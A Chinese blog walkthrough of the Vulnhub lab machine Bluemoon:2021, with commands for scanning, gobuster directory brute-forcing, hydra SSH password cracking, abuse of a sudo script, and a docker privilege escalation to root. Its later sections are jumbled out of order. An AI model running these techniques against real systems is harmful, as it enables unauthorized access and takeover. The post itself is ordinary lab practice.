渗透测试学习靶机,渗透测试靶机视频教程
终极管理员 知识笔记 73阅读
Vulnhub靶机Bluemoon: 2021渗透测试详解 Vulnhub靶机介绍Vulnhub靶机下载Vulnhub靶机安装Vulnhub靶机漏洞详解①信息收集②FTP登入③暴力破解④SSH登入⑤Sudo-docker提权⑥获取FLAG Vulnhub靶机渗透总结
Vulnhub靶机介绍
vulnhub是个提供各种漏洞平台的综合靶场可供下载多种虚拟机进行下载本地VMware或者Oracle VM打开即可像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
PS:需要获得root权限找到flag
DifficultyEasy 简单的
官网下载 https: //download.vulnhub.com/bluemoon/bluemoon.ova
Vulnhub靶机安装下载好了把安装包解压 然后使用 VMware或者Oracle VM打开即可。
kali里使用arp-scan -l或者netdiscover发现主机
渗透机kali IP 172.20.10.5 靶机IP 172.20.10.9
使用命令nmap -sS -sV -n -T4 -p- 172.20.10.9
开启了21,22和80端口访问80使用工具:dirbdirsearchgobuster 扫到/hidden_text
进行访问得到一个二维码 QR扫一下 得到账号密码userftp/ftppssword
gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,bak,txt,html,sql,zip,phtml,sh登入成功后发现两个文件 get进行下载 一个是账号一个是密码文件 可以进行爆破
这里使用hydra 九头蛇进行爆破命令如下:
hydra -l robin -P p_lists.txt ssh://172.20.10.9 爆破得到SSH账号密码为robin/k4rv3ndh4nh4ck3r尝试登入登入成功
这里找到一个flag。
老样子三件套whoami、id、uname -a 查看权限比较低 sudo -l 查看
发现jerry 用户的 /home/robin/project/feedback.sh文件 进行查看
sudo -u jerry /home/robin/project/feedback.sh 运行脚本得到shell 又找到个flag。
python3 -c import pty;pty.spawn(/bin/bash)1.信息收集 又是收获满满的一天最后创作不易希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐GTFOBins: ⑥获取FLAG
至此至此获取到了flag本篇文章渗透结束 感谢大家的观看dirbdirsearchgobusternikto 工具得使用
2.Sudo-docker提权 docker run -v /:/mnt --rm -it alpine chroot /mnt sh命令的使用
3.FTP下载、hydra爆破、SSH登入 渗透的流程思路